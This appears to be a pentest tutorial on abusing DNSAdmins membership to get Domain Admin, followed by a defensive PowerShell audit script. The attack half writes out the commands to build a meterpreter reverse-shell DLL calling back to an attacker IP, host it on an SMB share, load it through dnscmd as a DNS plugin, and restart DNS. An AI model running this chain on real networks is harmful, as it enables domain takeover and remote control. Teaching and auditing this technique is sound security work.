In this section we will learn how to escalate privileges to Domain Admin using DNSAdmins rights.
Let's start by enumerating the members of the DNSAdmins group.
Get-NetGroupMember -Identity "DNSAdmins"

Notice that we got two users.
Now, let's create a malicious DLL payload using msfvenom.
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.2.130 LPORT=444 -f dll -o administrator.dll

Now, let's start an SMB server that shares the current directory, which contains the DLL.
impacket-smbserver rem01x `pwd`

Now, let's go back to the target machine and configure the DNS server to load the DLL from the share as a server-level plugin.
dnscmd zerosploit.co /config /serverlevelplugindll \\\\192.168.2.130\\rem01x\\administrator.dll

Finally, restart the DNS service so that it loads the plugin DLL.
sc stop dns
sc start dns
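
To audit a DNS server for the change described above, the following added example (not part of the original page) reports any configured ServerLevelPluginDll, flags UNC paths, lists DnsAdmins members, and pulls recent plugin-load events. It assumes an elevated session on the DNS server with the ActiveDirectory RSAT module installed; the function name Get-DnsPluginAudit is hypothetical, and the event IDs are not taken from the page.

```powershell
# Added defensive example; Get-DnsPluginAudit is a hypothetical helper name.
# Run elevated on a DNS server / domain controller.
function Get-DnsPluginAudit {
    param(
        [string]$KeyPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
    )

    # 1. Is a server-level plugin DLL registered?
    #    dnscmd /config /serverlevelplugindll stores its path in this value.
    $prop = Get-ItemProperty -Path $KeyPath -Name ServerLevelPluginDll -ErrorAction SilentlyContinue
    $dll  = if ($prop) { $prop.ServerLevelPluginDll } else { $null }

    $isUnc = $false
    $sig   = $null
    if ($dll) {
        # A path on a remote share (\\host\share\...) is the strongest red flag.
        $isUnc = $dll -match '^\\\\'
        # Only inspect local files; never reach out to an untrusted share.
        if (-not $isUnc -and (Test-Path -LiteralPath $dll)) {
            $sig = (Get-AuthenticodeSignature -FilePath $dll).Status
        }
    }

    # 2. Who is able to change this setting? Expand nested groups.
    $members = Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
        Select-Object -ExpandProperty SamAccountName

    # 3. Recent plugin events in the DNS Server log
    #    (150 = plugin DLL failed to load, 770 = plugin DLL loaded).
    $filter = @{ LogName = 'DNS Server'; Id = 150, 770 }
    $events = Get-WinEvent -FilterHashtable $filter -MaxEvents 20 -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, Message

    [pscustomobject]@{
        PluginDll        = $dll
        IsUncPath        = $isUnc
        SignatureStatus  = $sig
        DnsAdminsMembers = $members
        PluginEvents     = $events
    }
}

$audit = Get-DnsPluginAudit
$audit | Format-List
if ($audit.PluginDll) {
    Write-Warning "ServerLevelPluginDll is set to '$($audit.PluginDll)'; confirm it is an approved plugin."
}
```

On most DNS servers the value is absent, so any non-empty result is worth investigating, and DnsAdmins membership should be kept as small as the two-user listing above would suggest reviewing.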